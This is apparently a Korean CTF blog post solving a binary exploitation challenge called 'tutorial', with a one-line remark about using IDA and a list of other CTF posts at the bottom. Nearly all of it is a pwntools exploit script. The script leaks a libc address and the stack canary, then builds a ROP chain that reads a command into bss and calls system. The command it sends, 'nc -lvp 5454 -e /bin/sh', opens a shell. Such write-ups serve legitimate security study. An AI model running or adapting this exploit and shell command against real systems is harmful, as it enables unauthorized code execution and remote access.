문제를 풀기위한 제약 조건이 많아서 ida로 그 조건을 찾아서 맞춰 줘야 바이너리가 정상적으로 실행됨.


from pwn import *

r = remote("localhost", 9797)
libc_elf = ELF("./libc-2.19.so")
elf = ELF("./tutorial")

read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
bss = elf.bss()
cmd = "nc -lvp 5454 -e /bin/sh\x00"
r.sendlineafter(">", "1")
r.recvuntil("Reference:")

libc_puts = int(r.recv(14), 16) + 1280
libc_system = libc_puts - 0x2a300
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("libc_system = {}".format(hex(libc_system)))

pop_rdi = libc_puts + 0x12e515
pop_rsi = libc_puts + 0xcd587
pop_rdx = libc_puts - 0x6dafe

r.sendlineafter(">", "2")

payload = "A"*311
r.sendlineafter("Time to test your exploit...", payload)

r.recvuntil("A\x0a")
canary = u64(r.recv(8))
log.info("canary = {}".format(hex(canary)))

print r.sendlineafter(">", "2")
payload = "\x90"*312
payload += p64(canary)
payload += "\x90"*8

payload += p64(pop_rdi)
payload += p64(4)
payload += p64(pop_rsi)
payload += p64(bss)
payload += p64(pop_rdx)
payload += p64(30)
payload += p64(read_plt)

payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(libc_system)
pause()
r.sendlineafter(">", payload)
pause()
r.sendline(cmd)



'CTF' 카테고리의 다른 글

plaid 2019 can you guess me?  (0) 2019.04.15
codegate2019 aeiou  (0) 2019.02.23
TJCTF 2016 oneshot  (0) 2019.01.24
QIWICTF 2016 pwn200  (0) 2019.01.23
SEC-T CTF PingPong  (0) 2018.09.16

+ Recent posts